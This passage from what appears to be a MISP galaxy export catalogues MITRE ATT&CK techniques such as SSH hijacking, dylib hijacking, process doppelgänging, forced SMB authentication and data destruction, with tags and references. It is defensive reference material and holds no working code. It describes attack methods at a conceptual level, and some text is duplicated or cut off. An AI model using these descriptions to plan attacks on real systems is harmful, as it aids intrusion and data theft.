Blackhat) (Citation: Clockwork SSH Agent Hijacking) Compromising the SSH agent also provides access to intercept SSH credentials. (Citation: Welivesecurity Ebury SSH)

[SSH Hijacking](https://attack.mitre.org/techniques/T1184) differs from use of [Remote Services](https://attack.mitre.org/techniques/T1021) because it injects into an existing SSH session rather than creating a new session using [Valid Accounts](https://attack.mitre.org/techniques/T1078).

The tag is: `misp-galaxy:mitre-attack-pattern="SSH Hijacking - T1184"`

SSH Hijacking - T1184 has relationships with:

- revoked-by: `misp-galaxy:mitre-attack-pattern="SSH Hijacking - T1563.001"` with estimative-language:likelihood-probability="almost-certain"

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**Web Service - T1481**

Adversaries may use an existing, legitimate external Web service as a means for relaying commands to a compromised system.

These commands may also include pointers to command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.

Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.

Use of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).

The tag is: `misp-galaxy:mitre-attack-pattern="Web Service - T1481"`

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LC_MAIN Hijacking - T1149

This technique has been deprecated and should no longer be used.

As of OS X 10.8, mach-O binaries introduced a new header called LC_MAIN that points to the binary's entry point for execution. Previously, there were two headers to achieve this same effect: LC_THREAD and LC_UNIXTHREAD (Citation: Prolific OSX Malware History). The entry point for a binary can be hijacked so that initial execution flows to a malicious addition (either another section or a code cave) and then goes back to the initial entry point so that the victim doesn't know anything was different (Citation: Methods of Mac Malware Persistence). By modifying a binary in this way, application whitelisting can be bypassed because the file name or application path is still the same.

The tag is: misp-galaxy:mitre-attack-pattern="LC_MAIN Hijacking - T1149"

Table 3732. Table References

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Disk Wipe - T1561

Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. With direct write access to a disk, adversaries may attempt to overwrite portions of disk data. Adversaries may opt to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot record (MBR). A complete wipe of all disk sectors may be attempted.

To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disks may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Novetta Blockbuster Destructive Malware)

The tag is: misp-galaxy:mitre-attack-pattern="Disk Wipe - T1561"

Table 3733. Table References

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Input Injection - T1516

A malicious application can inject input to the user interface to mimic user interaction through the abuse of Android’s accessibility APIs.

[Input Injection](https://attack.mitre.org/techniques/T1516) can be achieved using any of the following methods:

- Mimicking user clicks on the screen, for example to steal money from a user’s PayPal account.(Citation: android-trojan-steals-paypal-2fa)
- Injecting global actions, such as `GLOBAL_ACTION_BACK` (programatically mimicking a physical back button press), to trigger actions on behalf of the user.(Citation: Talos Gustuff Apr 2019)
- Inserting input into text fields on behalf of the user. This method is used legitimately to auto-fill text fields by applications such as password managers.(Citation: bitwarden autofill logins)

The tag is: `misp-galaxy:mitre-attack-pattern="Input Injection - T1516"`

Table 3734. Table References

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Startup Items - T1165

Per Apple’s documentation, startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items (Citation: Startup Items). This is technically a deprecated version (superseded by Launch Daemons), and thus the appropriate folder, `<code>/Library/StartupItems</code>` isn’t guaranteed to exist on the system by default, but does appear to exist by default on macOS Sierra. A startup item is a directory whose executable and configuration property list (plist), `<code>StartupParameters.plist</code>`, reside in the top-level directory.

An adversary can create the appropriate folders/files in the StartupItems directory to register their own persistence mechanism (Citation: Methods of Mac Malware Persistence). Additionally, since StartupItems run during the bootup phase of macOS, they will run as root. If an adversary is able to modify an existing Startup Item, then they will be able to Privilege Escalate as well.

The tag is: `misp-galaxy:mitre-attack-pattern="Startup Items - T1165"`
Access Notifications - T1517

A malicious application can read notifications sent by the operating system or other applications, which may contain sensitive data such as one-time authentication codes sent over SMS, email, or other mediums. A malicious application can also dismiss notifications to prevent the user from noticing that the notifications arrived and can trigger action buttons contained within notifications. (Citation: ESET 2FA Bypass)

The tag is: misp-galaxy:mitre-attack-pattern="Access Notifications - T1517"

Dylib Hijacking - T1157

macOS and OS X use a common method to look for required dynamic libraries (dylib) to load into a program based on search paths. Adversaries can take advantage of ambiguous paths to plant dylibs to gain privilege escalation or persistence.

A common method is to see what dylibs an application uses, then plant a malicious version with the same name higher up in the search path. This typically results in the dylib being in the same folder as the application itself. (Citation: Writing Bad Malware for OSX) (Citation: Malware Persistence on OS X)

If the program is configured to run at a higher privilege level than the current user, then when the dylib is loaded into the application, the dylib will also run at that elevated level. This can be used by adversaries as a privilege escalation technique.

The tag is: misp-galaxy:mitre-attack-pattern="Dylib Hijacking - T1157"
Software Discovery - T1518

Adversaries may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment. Adversaries may use the information from [Software Discovery](https://attack.mitre.org/techniques/T1518) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable to [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).

The tag is: *misp-galaxy:mitre-attack-pattern="Software Discovery - T1518"

Launch Agent - T1159

Per Apple's developer documentation, when a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list (plist) files found in `<code>/System/Library/LaunchAgents</code>`, `<code>/Library/LaunchAgents</code>`, and `<code>$HOME/Library/LaunchAgents</code>` (Citation: AppleDocs Launch Agent Daemons) (Citation: OSX Keydnap malware) (Citation: Antiquated Mac Malware). These launch agents have property list files which point to the executables that will be launched (Citation: OSX.Dok Malware).

Adversaries may install a new launch agent that can be configured to execute at login by using launchd or launchctl to load a plist into the appropriate directories (Citation: Sofacy Komplex Trojan) (Citation: Methods of Mac Malware Persistence). The agent name may be disguised by using a name from a related operating system or benign software. Launch Agents are created with user level privileges and are executed with the privileges of the user when they log in (Citation: OSX Malware Detection) (Citation: OceanLotus for OS X). They can be set up to execute when a specific...
user logs in (in the specific user's directory structure) or when any user logs in (which requires administrator privileges).

The tag is: `misp-galaxy:mitre-attack-pattern="Launch Agent - T1159"`

Launch Agent - T1159 has relationships with:

- revoked-by: `misp-galaxy:mitre-attack-pattern="Launch Agent - T1543.001"` with estimative-language:likelihood-probability="almost-certain"

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**Browser Extensions - T1176**

Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access. (Citation: Wikipedia Browser Extension)(Citation: Chrome Extensions Definition)

Malicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores so it may not be difficult for malicious extensions to defeat automated scanners. (Citation: Malicious Chrome Extension Numbers) Depending on the browser, adversaries may also manipulate an extension's update url to install updates from an adversary controlled server or manipulate the mobile configuration file to silently install additional extensions.

Previous to macOS 11, adversaries could silently install browser extensions via the command line using the `<code>profiles</code>` tool to install malicious `<code>mobileconfig</code>` files. In macOS 11+, the use of the `<code>profiles</code>` tool can no longer install configuration profiles, however `<code>mobileconfig</code>` files can be planted and installed with user
Once the extension is installed, it can browse to websites in the background, steal all information that a user enters into a browser (including credentials) and be used as an installer for a RAT for persistence.

There have also been instances of botnets using a persistent backdoor through malicious Chrome extensions. There have also been similar examples of extensions being used for command & control.

The tag is: misp-galaxy:mitre-attack-pattern="Browser Extensions - T1176"

Table 3740. Table References

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<td><a href="https://kjaer.io/extension-malware/">https://kjaer.io/extension-malware/</a></td>
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Securityd Memory - T1167

In OS X prior to El Capitan, users with root access can read plaintext keychain passwords of logged-in users because Apple’s keychain implementation allows these credentials to be cached so that users are not repeatedly prompted for passwords. Apple’s securityd utility takes the user’s logon password, encrypts it with PBKDF2, and stores this master key in memory. Apple also uses a set of keys and algorithms to encrypt the user’s password, but once the master key is found, an attacker need only iterate over the other values to unlock the final password.

If an adversary can obtain root access (allowing them to read securityd’s memory), then they can scan through memory to find the correct sequence of keys in relatively few tries to decrypt the user’s logon keychain. This provides the adversary with all the plaintext passwords for users, WiFi,
mail, browsers, certificates, secure notes, etc. (Citation: OS X Keychain) (Citation: OSX Keydnap malware)

The tag is: misp-galaxy:mitre-attack-pattern="Securityd Memory - T1167"

Securityd Memory - T1167 has relationships with:


Table 3741. Table References

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**Process Doppelgänging - T1186**

Windows Transactional NTFS (TxF) was introduced in Vista as a method to perform safe file operations. (Citation: Microsoft TxF) To ensure data integrity, TxF enables only one transacted handle to write to a file at a given time. Until the write handle transaction is terminated, all other handles are isolated from the writer and may only read the committed version of the file that existed at the time the handle was opened. (Citation: Microsoft Basic TxF Concepts) To avoid corruption, TxF performs an automatic rollback if the system or application fails during a write transaction. (Citation: Microsoft Where to use TxF)

Although deprecated, the TxF application programming interface (API) is still enabled as of Windows 10. (Citation: BlackHat Process Doppelgänging Dec 2017)

Adversaries may leverage TxF to perform a file-less variation of [Process Injection](https://attack.mitre.org/techniques/T1055) called Process Doppelgänging. Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1093), Process Doppelgänging involves replacing the memory of a legitimate process, enabling the veiled execution of malicious code that may evade defenses and detection. Process Doppelgänging's use of TxF also avoids the use of highly-monitored API functions such as NtUnmapViewOfSection, VirtualProtectEx, and SetThreadContext. (Citation: BlackHat Process Doppelgänging Dec 2017)

Process Doppelgänging is implemented in 4 steps (Citation: BlackHat Process Doppelgänging Dec 2017):

- Transact – Create a TxF transaction using a legitimate executable then overwrite the file with malicious code. These changes will be isolated and only visible within the context of the transaction.
- Load – Create a shared section of memory and load the malicious executable.
- Rollback – Undo changes to original executable, effectively removing malicious code from the
file system.

- **Animate** – Create a process from the tainted section of memory and initiate execution.

The tag is: `misp-galaxy:mitre-attack-pattern="Process Doppelgänging - T1186"`

Process Doppelgänging - T1186 has relationships with:


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**LSASS Driver - T1177**

The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process. (Citation: Microsoft Security Subsystem)

Adversaries may target lsass.exe drivers to obtain execution and/or persistence. By either replacing or adding illegitimate drivers (e.g., [DLL Side-Loading](https://attack.mitre.org/techniques/T1073) or [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038)), an adversary can achieve arbitrary code execution triggered by continuous LSA operations.

The tag is: `misp-galaxy:mitre-attack-pattern="LSASS Driver - T1177"`

LSASS Driver - T1177 has relationships with:

- revoked-by: `misp-galaxy:mitre-attack-pattern="LSASS Driver - T1547.008"` with estimative-language:likelihood-probability="almost-certain"

**Table 3743. Table References**

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1684
Forced Authentication - T1187

Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.

The Server Message Block (SMB) protocol is commonly used in Windows networks for authentication and communication between systems for access to resources and file sharing. When a Windows system attempts to connect to an SMB resource it will automatically attempt to authenticate and send credential information for the current user to the remote system. (Citation: Wikipedia Server Message Block) This behavior is typical in enterprise environments so that users do not need to enter credentials to access network resources.

Web Distributed Authoring and Versioning (WebDAV) is also typically used by Windows systems as a backup protocol when SMB is blocked or fails. WebDAV is an extension of HTTP and will typically operate over TCP ports 80 and 443. (Citation: Didier Stevens WebDAV Traffic) (Citation: Microsoft Managing WebDAV Security)

Adversaries may take advantage of this behavior to gain access to user account hashes through forced SMB/WebDAV authentication. An adversary can send an attachment to a user through spearphishing that contains a resource link to an external server controlled by the adversary (i.e. [Template Injection](https://attack.mitre.org/techniques/T1221)), or place a specially crafted file on navigation path for privileged accounts (e.g. .SCF file placed on desktop) or on a publicly accessible share to be accessed by victim(s). When the user’s system accesses the untrusted resource it will attempt authentication and send information, including the user’s hashed credentials, over SMB to the adversary controlled server. (Citation: GitHub Hashjacking) With access to the credential hash, an adversary can perform off-line [Brute Force](https://attack.mitre.org/techniques/T1110) cracking to gain access to plaintext credentials. (Citation: Cylance Redirect to SMB)

There are several different ways this can occur. (Citation: Osanda Stealing NetNTLM Hashes) Some specifics from in-the-wild use include:

- A spearphishing attachment containing a document with a resource that is automatically loaded when the document is opened (i.e. [Template Injection](https://attack.mitre.org/techniques/T1221)). The document can include, for example, a request similar to `<code>file:][/\remote address]/Normal.dotm</code>` to trigger the SMB request. (Citation: US-CERT APT Energy Oct 2017)

- A modified .LNK or .SCF file with the icon filename pointing to an external reference such as `<code>[/\remote address]/pic.png</code>` that will force the system to load the resource when the icon is rendered to repeatedly gather credentials. (Citation: US-CERT APT Energy Oct 2017)
BITS Jobs - T1197

Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM). BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.

The interface to create and manage BITS jobs is accessible through [PowerShell](https://attack.mitre.org/techniques/T1059/001) and the [BITSAdmin](https://attack.mitre.org/software/S0190) tool. BITS enabled execution may also enable persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots).

BITS upload functionalities can also be used to perform [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048). BITS upload functionalities can also be used to perform [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048). BITS upload functionalities can also be used to perform [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048). BITS upload functionalities can also be used to perform [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).

The tag is: *misp-galaxy:mitre-attack-pattern="BITS Jobs - T1197"*
Trusted Relationship - T1199

Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship exploits an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network.

Organizations often grant elevated access to second or third-party external providers in order to allow them to manage internal systems as well as cloud-based environments. Some examples of these relationships include IT services contractors, managed security providers, infrastructure contractors (e.g. HVAC, elevators, physical security). The third-party provider’s access may be intended to be limited to the infrastructure being maintained, but may exist on the same network as the rest of the enterprise. As such, [Valid Accounts](https://attack.mitre.org/techniques/T1078) used by the other party for access to internal network systems may be compromised and used.(Citation: CISA IT Service Providers)

The tag is: misp-galaxy:mitre-attack-pattern="Trusted Relationship - T1199"

Table 3746. Table References

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Misattributable credentials - T1322

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1322).

The use of credentials by an adversary with the intent to hide their true identity and/or portray
them self as another person or entity. An adversary may use misattributable credentials in an attack to convince a victim that credentials are legitimate and trustworthy when this is not actually the case. (Citation: FakeSSLCerts)

The tag is: misp-galaxy:mitre-attack-pattern="Misattributable credentials - T1322"

**Table 3747. Table References**

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**Data Encrypted - T1532**

Data is encrypted before being exfiltrated in order to hide the information that is being exfiltrated from detection or to make the exfiltration less conspicuous upon inspection by a defender. The encryption is performed by a utility, programming library, or custom algorithm on the data itself and is considered separate from any encryption performed by the command and control or file transfer protocol. Common file formats that can encrypt files are RAR and zip.

The tag is: misp-galaxy:mitre-attack-pattern="Data Encrypted - T1532"

**Table 3748. Table References**

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**DNS poisoning - T1382**

This technique has been deprecated. Please see ATT&CK’s Initial Access and Execution tactics for replacement techniques.

DNS (cache) poisoning is the corruption of an Internet server's domain name system table by replacing an Internet address with that of another, rogue address. When a Web user seeks the page with that address, the request is redirected by the rogue entry in the table to a different address. (Citation: Google DNS Poisoning) (Citation: DNS Poisoning China) (Citation: Mexico Modem DNS Poison)

The tag is: misp-galaxy:mitre-attack-pattern="DNS poisoning - T1382"

**Table 3749. Table References**

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**Process Discovery - T1424**

On Android versions prior to 5, applications can observe information about other processes that are running through methods in the ActivityManager class. On Android versions prior to 7,
applications can obtain this information by executing the `<code>ps</code>` command, or by examining the `<code>/proc</code>` directory. Starting in Android version 7, use of the Linux kernel's `<code>hidepid</code>` feature prevents applications (without escalated privileges) from accessing this information (Citation: Android-SELinuxChanges).

The tag is: `misp-galaxy:mitre-attack-pattern="Process Discovery - T1424"`

**Table 3750. Table References**

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**Capture Audio - T1429**

Adversaries may capture audio to collect information on a user of a mobile device using standard operating system APIs. Adversaries may target audio information such as user conversations, surroundings, phone calls, or other sensitive information.

Android and iOS, by default, requires that an application request access to microphone devices from the user. In Android, applications must hold the `<code>android.permission.RECORD_AUDIO</code>` permission to access the microphone and the `<code>android.permission.CAPTURE_AUDIO_OUTPUT</code>` permission to access audio output such as speakers. Android does not allow third-party applications to hold `<code>android.permission.CAPTURE_AUDIO_OUTPUT</code>`, so audio output can only be obtained by privileged applications (distributed by Google or the device vendor) or after a successful privilege escalation attack. In iOS, applications must include the `NSMicrophoneUsageDescription` key in their `Info.plist` file.

The tag is: `misp-galaxy:mitre-attack-pattern="Capture Audio - T1429"`

**Table 3751. Table References**

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**Unsecured Credentials - T1552**

Adversaries may search compromised systems to find and obtain insecurely stored credentials. These credentials can be stored and/or misplaced in many locations on a system, including plaintext files (e.g. [Bash History](https://attack.mitre.org/techniques/T1552/003)), operating system or application-specific repositories (e.g. [Credentials in Registry](https://attack.mitre.org/techniques/T1552/002)), or other specialized files/artifacts (e.g. [Private Keys](https://attack.mitre.org/techniques/T1552/004)).

The tag is: `misp-galaxy:mitre-attack-pattern="Unsecured Credentials - T1552"`
Impair Defenses - T1562

Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.

Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.

The tag is: `misp-galaxy:mitre-attack-pattern="Impair Defenses - T1562"`

Protocol Tunneling - T1572

Adversaries may tunnel network communications to and from a victim system within a separate protocol to avoid detection/network filtering and/or enable access to otherwise unreachable systems. Tunneling involves explicitly encapsulating a protocol within another. This behavior may conceal malicious traffic by blending in with existing traffic and/or provide an outer layer of encryption (similar to a VPN). Tunneling could also enable routing of network packets that would otherwise not reach their intended destination, such as SMB, RDP, or other traffic that would be filtered by network appliances or not routed over the Internet.

There are various means to encapsulate a protocol within another protocol. For example, adversaries may perform SSH tunneling (also known as SSH port forwarding), which involves forwarding arbitrary data over an encrypted SSH tunnel.(Citation: SSH Tunneling)

[Protocol Tunneling](https://attack.mitre.org/techniques/T1572) may also be abused by adversaries during [Dynamic Resolution](https://attack.mitre.org/techniques/T1568). Known as DNS over HTTPS (DoH), queries to resolve C2 infrastructure may be encapsulated within encrypted HTTPS packets.(Citation: BleepingComp Godlua JUL19)

Adversaries may also leverage [Protocol Tunneling](https://attack.mitre.org/techniques/T1572) in conjunction with [Proxy](https://attack.mitre.org/techniques/T1090) and/or [Protocol Impersonation](https://attack.mitre.org/techniques/T1001/003) to further conceal C2 communications and infrastructure.

The tag is: `misp-galaxy:mitre-attack-pattern="Protocol Tunneling - T1572"`
Table 3754. Table References

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**SMS Control - T1582**

Adversaries may delete, alter, or send SMS messages without user authorization. This could be used to hide C2 SMS messages, spread malware, or various external effects.

This can be accomplished by requesting the `RECEIVE_SMS` or `SEND_SMS` permissions depending on what the malware is attempting to do. If the app is set as the default SMS handler on the device, the `SMS_DELIVER` broadcast intent can be registered, which allows the app to write to the SMS content provider. The content provider directly modifies the messaging database on the device, which could allow malicious applications with this ability to insert, modify, or delete arbitrary messages on the device. (Citation: SMS KitKat)(Citation: Android SmsProvider)

The tag is: `misp-galaxy:mitre-attack-pattern="SMS Control - T1582"`

Table 3755. Table References

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**Dumpster dive - T1286**

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1286).

Dumpster diving is looking through waste for information on technology, people, and/or organizational items of interest. (Citation: FriedDumpsters)

The tag is: `misp-galaxy:mitre-attack-pattern="Dumpster dive - T1286"`
Dynamic DNS - T1333

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1333).

Dynamic DNS is a automated method to rapidly update the domain name system mapping of hostnames to IPs. (Citation: FireEyeSupplyChain)

The tag is: `misp-galaxy:mitre-attack-pattern="Dynamic DNS - T1333"`

Dynamic DNS - T1333 has relationships with:

- related-to: `misp-galaxy:mitre-attack-pattern="Dynamic DNS - T1311"` with estimative-language:likelihood-probability="almost-certain"

Port redirector - T1363

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1363).

Redirecting a communication request from one address and port number combination to another. May be set up to obfuscate the final location of communications that will occur in later stages of an attack. (Citation: SecureWorks HTRAN Analysis)

The tag is: `misp-galaxy:mitre-attack-pattern="Port redirector - T1363"

Internal Spearphishing - T1534

Adversaries may use internal spearphishing to gain access to additional information or exploit other users within the same organization after they already have access to accounts or systems within the environment. Internal spearphishing is multi-staged attack where an email account is owned either by controlling the user's device with previously installed malware or by
Adversaries may leverage [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) or [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) as part of internal spearphishing to deliver a payload or redirect to an external site to capture credentials through [Input Capture](https://attack.mitre.org/techniques/T1056) on sites that mimic email login interfaces.

There have been notable incidents where internal spearphishing has been used. The Eye Pyramid campaign used phishing emails with malicious attachments for lateral movement between victims, compromising nearly 18,000 email accounts in the process.(Citation: Trend Micro When Phishing Starts from the Inside 2017) The Syrian Electronic Army (SEA) compromised email accounts at the Financial Times (FT) to steal additional account credentials. Once FT learned of the attack and began warning employees of the threat, the SEA sent phishing emails mimicking the Financial Times IT department and were able to compromise even more users.(Citation: THE FINANCIAL TIMES LTD 2019.)

The tag is: **misp-galaxy:mitre-attack-pattern="Internal Spearphishing - T1534"**

Table 3759. Table References

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**Credential pharming - T1374**

This technique has been deprecated. Please see ATT&CK’s Initial Access and Execution tactics for replacement techniques.

Credential pharming a form of attack designed to steal users’ credential by redirecting users to fraudulent websites. Pharming can be conducted either by changing the hosts file on a victim’s computer or by exploitation of a vulnerability in DNS server software. (Citation: DriveByPharming) (Citation: GoogleDrive Phishing)

The tag is: **misp-galaxy:mitre-attack-pattern="Credential pharming - T1374"**

Table 3760. Table References

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**Encrypted Channel - T1573**

Adversaries may employ a known encryption algorithm to conceal command and control traffic.
rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.

The tag is: misp-galaxy:mitre-attack-pattern="Encrypted Channel - T1573"

**Table 3761. Table References**

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**Acquire Infrastructure - T1583**

Adversaries may buy, lease, or rent infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Additionally, botnets are available for rent or purchase.

Use of these infrastructure solutions allows an adversary to stage, launch, and execute an operation. Solutions may help adversary operations blend in with traffic that is seen as normal, such as contact to third-party web services. Depending on the implementation, adversaries may use infrastructure that makes it difficult to physically tie back to them as well as utilize infrastructure that can be rapidly provisioned, modified, and shut down.

The tag is: misp-galaxy:mitre-attack-pattern="Acquire Infrastructure - T1583"

**Table 3762. Table References**

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**Device Lockout - T1446**

An adversary may seek to lock the legitimate user out of the device, for example to inhibit user interaction or to obtain a ransom payment.

On Android versions prior to 7, apps can abuse Device Administrator access to reset the device lock passcode to prevent the user from unlocking the device. After Android 7, only device or profile owners (e.g. MDMs) can reset the device's passcode.(Citation: Android resetPassword)

On iOS devices, this technique does not work because mobile device management servers can only remove the screen lock passcode, they cannot set a new passcode. However, on jailbroken devices,
malware has been discovered that can lock the user out of the device. (Citation: Xiao-KeyRaider)

The tag is: misp-galaxy:mitre-attack-pattern="Device Lockout - T1446"

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**Hide Artifacts - T1564**

Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection. (Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015)

Adversaries may also attempt to hide artifacts associated with malicious behavior by creating computing regions that are isolated from common security instrumentation, such as through the use of virtualization technology. (Citation: Sophos Ragnar May 2020)

The tag is: misp-galaxy:mitre-attack-pattern="Hide Artifacts - T1564"

Table 3764. Table References

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**Compromise Infrastructure - T1584**

Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, and third-party web services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle. (Citation: Mandiant APT1)(Citation: ICANN Domain Name Hijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS
Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage.

Use of compromised infrastructure allows an adversary to stage, launch, and execute an operation. Compromised infrastructure can help adversary operations blend in with traffic that is seen as normal, such as contact with high reputation or trusted sites. By using compromised infrastructure, adversaries may make it difficult to tie their actions back to them. Prior to targeting, adversaries may compromise the infrastructure of other adversaries. (Citation: NSA NCSC Turla OilRig)

The tag is: misp-galaxy:mitre-attack-pattern="Compromise Infrastructure - T1584"

Table 3765. Table References

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Data Destruction - T1485

Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives. (Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018)(Citation: Talos Olympic Destroyer 2018) Common operating system file deletion commands such as `<code>del</code>` and `<code>rm</code>` often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) and [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) because individual files are destroyed rather than sections of a storage disk or the disk's logical structure.

Adversaries may attempt to overwrite files and directories with randomly generated data to make it irrecoverable. (Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) In some cases politically oriented image files have been used to overwrite data. (Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)

To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002). (Citation: Symantec Shamoon 2012)(Citation: Symantec Shamoon 2012)(Citation: Symantec Shamoon 2012)
In cloud environments, adversaries may leverage access to delete cloud storage, cloud storage accounts, machine images, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ - Cisco Insider)

The tag is: *misp-galaxy:mitre-attack-pattern="Data Destruction - T1485"

**Table 3766. Table References**

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**Firmware Corruption - T1495**

Adversaries may overwrite or corrupt the flash memory contents of system BIOS or other firmware in devices attached to a system in order to render them inoperable or unable to boot.(Citation: Symantec Chernobyl W95.CIH) Firmware is software that is loaded and executed from non-volatile memory on hardware devices in order to initialize and manage device functionality. These devices could include the motherboard, hard drive, or video cards.

The tag is: *misp-galaxy:mitre-attack-pattern="Firmware Corruption - T1495"

**Table 3767. Table References**

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Resource Hijacking - T1496

Adversaries may leverage the resources of co-opted systems in order to solve resource intensive problems which may impact system and/or hosted service availability.

One common purpose for Resource Hijacking is to validate transactions of cryptocurrency networks and earn virtual currency. Adversaries may consume enough system resources to negatively impact and/or cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood Blog 2017) Servers and cloud-based(Citation: CloudSploit - Unused AWS Regions) systems are common targets because of the high potential for available resources, but user endpoint systems may also be compromised and used for Resource Hijacking and cryptocurrency mining. Containerized environments may also be targeted due to the ease of deployment via exposed APIs and the potential for scaling mining activities by deploying or compromising multiple containers within an environment or cluster.(Citation: Unit 42 Hildegard Malware)(Citation: Trend Micro Exposed Docker APIs)

Additionally, some cryptocurrency mining malware kills off processes for competing malware to ensure it’s not competing for resources.(Citation: Trend Micro War of Crypto Miners)

The tag is: misp-galaxy:mitre-attack-pattern="Resource Hijacking - T1496"

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Service Stop - T1489

Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services or processes can inhibit or stop response to an incident or aid in the adversary’s overall objectives to cause damage to the environment.(Citation: Talos Olympic Destroyer 2018)(Citation: Novetta Blockbuster)

